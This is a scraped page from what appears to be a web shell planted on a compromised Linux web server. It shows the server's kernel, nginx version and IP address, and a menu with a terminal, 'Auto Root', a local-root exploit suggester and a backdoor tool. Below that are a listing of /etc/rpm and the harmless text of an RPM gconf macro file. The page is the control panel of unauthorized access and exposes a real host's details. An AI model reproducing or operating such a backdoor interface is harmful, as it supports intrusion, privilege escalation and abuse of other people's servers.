Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.141.7.31
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
rpm /
Delete
Unzip
Name
Size
Permission
Date
Action
macros.color
151
B
-rw-r--r--
2014-06-09 22:01
macros.dist
66
B
-rw-r--r--
2020-11-23 15:08
macros.dwz
1.76
KB
-rw-r--r--
2019-08-06 22:25
macros.gconf2
2.61
KB
-rw-r--r--
2014-01-24 22:41
macros.ghc-srpm
215
B
-rw-r--r--
2019-08-06 22:25
macros.gnat-srpm
227
B
-rw-r--r--
2019-08-06 22:25
macros.mono-srpm
121
B
-rw-r--r--
2019-08-06 22:25
macros.nodejs-srpm
228
B
-rw-r--r--
2019-08-06 22:25
macros.ocaml-srpm
115
B
-rw-r--r--
2019-08-06 22:25
macros.perl
5.01
KB
-rw-r--r--
2020-09-30 13:18
macros.perl-srpm
794
B
-rw-r--r--
2014-06-09 19:44
macros.python-srpm
3.75
KB
-rw-r--r--
2020-10-13 16:03
Save
Rename
# # RPM macros for gconf applications. # # (c) 2006-2007 SUSE LINUX # Author: Stanislav Brabec <sbrabec@suse.cz> # (c) 2009 Red Hat, Inc # Author: Toshio Kuratomi <toshio@fedoraproject.org> # # License: LGPLv2+ # # Usage: # # Preamble: # Requires(pre): GConf2 # Requires(preun): GConf2 # Requires(post): GConf2 # # schemas names are without path and suffix # # # %pre # %gconf_schema_obsolete schema1 # %gconf_schema_prepare schema2 schema3 # # %preun # %gconf_schema_remove schema2 schema3 # # %post # %gconf_schema_upgrade schema2 schema3 # # %files # %{_sysconfdir}/gconf/schemas/schema2.schemas # %{_sysconfdir}/gconf/schemas/schema3.schemas # Copy schemas from old package for later uninstall on upgrade %gconf_schema_prepare() \ if [ "$1" -gt 1 ] ; then \ rm -rf %{_localstatedir}/lib/rpm-state/gconf/* \ for schema in %{*} ; do \ if test -f %{_sysconfdir}/gconf/schemas/"$schema".schemas ; then \ cp -p %{_sysconfdir}/gconf/schemas/"$schema".schemas %{_localstatedir}/lib/rpm-state/gconf/ || : \ fi \ done \ fi \ %{nil} # Macro to remove schemas. Not meant to be used publically %_do_gconf_schema_remove() \ if test -f %{_sysconfdir}/gconf/schemas/"$schema".schemas ; then \ export GCONF_CONFIG_SOURCE=`gconftool-2 --get-default-source` \ gconftool-2 --makefile-uninstall-rule %{_sysconfdir}/gconf/schemas/"$schema".schemas > /dev/null || : \ fi \ %{nil} # Remove schemas unconditionally %gconf_schema_obsolete() \ for schema in %{*} ; do \ %_do_gconf_schema_remove \ done \ %{nil} # Remove schemas on package removal (not upgrade) %gconf_schema_remove() \ if [ "$1" -eq 0 ] ; then \ for schema in %{*} ; do \ %_do_gconf_schema_remove \ done \ fi \ %{nil} %gconf_schema_upgrade() \ for schema in %{*} ; do \ if test -f %{_localstatedir}/lib/rpm-state/gconf/"$schema".schemas ; then \ cmp --quiet %{_sysconfdir}/gconf/schemas/"$schema".schemas %{_localstatedir}/lib/rpm-state/gconf/"$schema".schemas \ if test $? != 0; then\ export GCONF_CONFIG_SOURCE=`gconftool-2 --get-default-source` \ gconftool-2 --makefile-uninstall-rule %{_localstatedir}/lib/rpm-state/gconf/"$schema".schemas > /dev/null || : \ gconftool-2 --makefile-install-rule %{_sysconfdir}/gconf/schemas/"$schema".schemas > /dev/null || : \ fi \ rm -f %{_localstatedir}/lib/rpm-state/gconf/"$schema".schemas \ else \ export GCONF_CONFIG_SOURCE=`gconftool-2 --get-default-source` \ gconftool-2 --makefile-install-rule %{_sysconfdir}/gconf/schemas/"$schema".schemas > /dev/null || : \ fi \ done \ %{nil}